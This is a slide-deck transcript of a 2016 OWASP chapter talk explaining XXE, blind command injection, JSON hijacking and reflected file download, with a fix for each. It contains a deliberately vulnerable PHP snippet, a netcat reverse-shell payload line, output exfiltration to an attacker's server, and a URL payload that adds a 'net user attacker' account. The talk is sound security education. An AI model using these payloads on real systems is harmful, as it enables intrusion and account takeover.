owasp pune chapter : dive into the profound web attacks
TRANSCRIPT
Narendra Bhati - Security [email protected]
Dive Into The Profound Web Attacks
OWASP Pune Chapter – 18th Feb 2016
Speaker: Narendra BhatiSecurity Analyst @Suma Soft Pvt. Ltd. – Pune
Researcher & Part Time Bug Bounty HunterListed in HOF for reporting security
Vulnerabilities like Facebook, Google, Mozilla, Twitter etc.Hold more then 12 CVE & 3 Zero days vulnerabilities.
Blog – http://websecgeeks.com
“Who Am I - r00tsh3ll”
If you have any questions or query regarding the talk, Kindly note it down. So we can discuss it at the end.
3
Dive Into The Profound Web Attacks
• XXE ( XML External Entity Injection)
• Blind RCE ( Blind Remote/OS Command Execution )
• JSON Response Hijacking
• Reflected File Download
• XXE ( XML External Entity Injection)
5
• XXE ( XML External Entity Injection)
According To OWASP
An XML External Entity attack is a type of an injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data
6
• XXE ( XML External Entity Injection)
Why XXE Take Place ?
Failure to validate External XML Entity which gives an attacker the accessing internal resources/data
7
• XXE ( XML External Entity Injection)
Lets Have A Demo !
8
• XXE ( XML External Entity Injection)Getting connection from target domain
9
Accessing internal directories. Doing brute forcing or anything we found a directory in localhost called “/betatesting/testing.php” which is a network utility.
Invalid directory. Response with failed to load external entity.
Valid directory. Response without failed to load external entity or some kind of difference in valid and invalid directory response..
• XXE ( XML External Entity Injection)
10
I am leaving the rest of the process, As per the “testing.php” response. We added a get parameter called “ping” and see we were to able to execute commands.
This is a scenario, Where target system have some beta testing application which is under development or etc. You should figured out what you can do with XXE or any other vulnerability
• XXE ( XML External Entity Injection)
Fixing The XXE
Disable XML parser in order to prevent XXE
For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )
For .Net:settings.XmlResolver = null;
Look for the other languages as well.
11
• XXE ( XML External Entity Injection)
Fixing The XXE
Disable XML parser in order to prevent XXE
For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )
For .Net:settings.XmlResolver = null;
Look for the other languages as well.
12
• XXE ( XML External Entity Injection)
Fixing The XXE
Disable XML parser in order to prevent XXE
For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )
For .Net:settings.XmlResolver = null;
Look for the other languages as well.
13
Blind RCE ( Blind Remote/OS Command Execution )
14
Blind RCE ( Blind Remote/OS Command Execution )
According To Nature/Behaviour Similar or Elder Brother Of Blind SQL Injection vulnerability.
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application
According To OWASP
15
Blind RCE ( Blind Remote/OS Command Execution )
Why RCE Take Place ?
Missing/Lack of sanitization of user input, which will append at system shell while execution.
16
Blind RCE ( Blind Remote/OS Command Execution )
Ex. Vulnerable Code As PHP
<?phpprint("Please specify the name of the file to delete");print("<p>");$file=$_GET['filename'];system("rm $file");?>
Injection Point
17
Blind RCE ( Blind Remote/OS Command Execution )Some Basic About Using Double Commands
• A; B = Run A and then B, no matter success execution of A
• A || B = Run B if A failed, No matter if B got failed, A will still run
• A && B = Run B if A works, If A Failed B will not execute
• A & B = Run B and then run A in background, If A failed B will still get executed
• A | B = Run A and pass the output of A to B
• A %0a B (Use full for web app)
• $(nc –nv ip port –e /bin/bash) 18
Blind RCE ( Blind Remote/OS Command Execution )
Demo Time
Normal RCE | Some Bypasses | Blind RCE [Low-Medium]
19
Blind RCE ( Blind Remote/OS Command Execution )
Detection On Time Delay Response
20
Response comes in 4 Sec Aprox.
Response comes in 11 Sec Aprox.
Blind RCE ( Blind Remote/OS Command Execution )
21
In demonstration, We are assuming that target server is configured in such a way that he will not send reverse connection using netcat -e option and we cant use wget also.
Response from command “id” getting logged in our python simple http server
Lets see are we able to access the /var/tmp folder.Yes we are because in python server we got the response as /var/tmp
Using similar kind of aproach, We can interact with shell response. Remember we are not using netcat –e option for the response, But we are just piping the output to another machine
Blind RCE ( Blind Remote/OS Command Execution )
Fixing The Command Execution
• The developer should scrub all input for malicious characters.
• It is much easier to define the legal characters than the illegal characters.
22
JSON Response Hijacking
23
JSON Response Hijacking
Similar to CSRF, This vulnerability basically based on Browsers Bug which allow an attacker to steal sensitive JSON response from victim authenticated session or there could be more interesting thing.
According To Sources
24
JSON Response HijackingJSON Hijacking Happened If
Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
• returns sensitive data.
• returns a JSON array. [ content type-json]
• responds to GET requests.
• the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method.
25
JSON Response Hijacking
Lets Dive Into The Demo
26
JSON Response Hijacking
Fixing JSON Hijacking
Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
• Only return JSON objects to POST requests.• Prevent the web browser from interpreting the
JSON object as valid JavaScript code.• Implement CSRF protection random tokens for all
JSON requests.
27
Reflected File Download
28
Reflected File Download
According To Sources
29
RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain.Recently found in Facebook & Google Etc by researchers.
Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Reflected File Download
Reflected: There should be reflection of the value given in the URL as response
Filename: File name should allowing or characterized by great or excessive freedom of behavior which should also accept additional user control values and file type.Like application can accept filename between first slash “/” and “?” character.Ex. Code (PHP)(Will Not Work)
Lets Separate Those Words
30
Reflected File Download
Download :
https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycommand “malicious.bat/,exe“
So basically this is browser behavior that how he will handle the download process,Mention behavior is for chrome Expect other browsers.
Other brewers may have different behavior for the same.
Lets Separate Those Words
31
Reflected File Download
1. Attacker send a malicious URL to victim of trusted domain.
Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker
2. Victim found the domain is trusted. So he will access the URL.
3. After clicking on the URL, The file will be downloaded and after executing that file, Some interesting thing will happened. ;)
Attack Scenario
32
Reflected File Download
Lets See A Demo
33
Reflected File DownloadAs you can can see we having a web application. The
value of download parameter is getting back in response without file name header.
And the response is downloadable
34
Reflected File DownloadNow we are going to enter a file name in url, Because the response header don’t have the file name header. So we have chance that we can control the file name
from URL it self.
35
Reflected File DownloadNow can craft a payload as input which will execute some system command on victim machine.As per the reflection we can separate out the rest of the value to perform a command execution
36
Reflected File DownloadAfter executing that file we have calc execution.
37
Reflected File DownloadCreate some interesting payload. Before doing lets check out user accounts.
38
Reflected File DownloadAfter executing the downloaded file, We have an another user account called “attacker”
39
Reflected File Download
Add - Content-Disposition: attachment; filename=anyfile.pdf/txt
Don’t allow the application to take permissive input.
Limit the callback function for “;:/” characters.
Fixing The Reflected File Download
40
41Source-http://www.gapingvoidart.com/gallery/images/142061/any-questions.gif?sw,605,476,0,0,100,16777215,368040352
Thanks, For listening peacefully
Kindly send me your feedback regarding the talk on – [email protected] will help me to improve the presentation next time.
42